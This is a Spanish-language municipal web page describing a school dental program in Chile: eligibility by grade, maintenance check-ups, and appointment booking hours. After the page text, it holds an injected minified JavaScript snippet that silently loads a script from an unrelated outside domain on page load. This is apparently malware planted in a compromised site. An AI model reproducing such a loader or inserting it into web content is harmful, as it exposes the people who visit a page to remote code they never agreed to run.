Módulos Dentales


El Programa Municipal de Módulos Dentales realiza altas integrales y controles de mantención. En ambas modalidades se realizan acciones destinadas a la recuperación del daño buco-dentario acumulado, como consecuencia de caries y gingivitis, además de sesiones educativas y preventivas, con la diferencia que las altas integrales son niños que ingresan al módulo por primera vez y los controles de mantención consisten en la atención anual programada sucesiva y sistemática, que recibe un alumno ya atendido en un año anterior hasta que egresa de 8º básico o bien abandona el establecimiento adscrito.

Dirigido a:

a) Todos los escolares de prekinder, kinder, y sólo los niños de 1º básico mayores de 7 años (exceptuando niños cubiertos por GES o AUGE de salud oral integral para los niños de 6 años, a 6 años 11 meses).

B) Alumnos que estén bajo control de 2º,3º,5º, 7º y 8º básico.

c) Todos los niños pertenecientes al Programa Chile Solidario de cualquier otro curso.

d) Niños que estén cursando 2º, 3º, 5 ó 7º básico que no tuvieron acceso a las atenciones iniciales o se trasladaron de otra escuela o por diversas razones desertaron.

Entrega de Horas de Atención:

Los ingresos se programan anualmente enviando citación al establecimiento. A su vez los apoderados pueden solicitar hora por teléfono al número 225360571 de lunes a jueves de 12:00 a 13:30 hrs o personalmente de 15:00 a 16:30 hrs.
;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P'); //]]>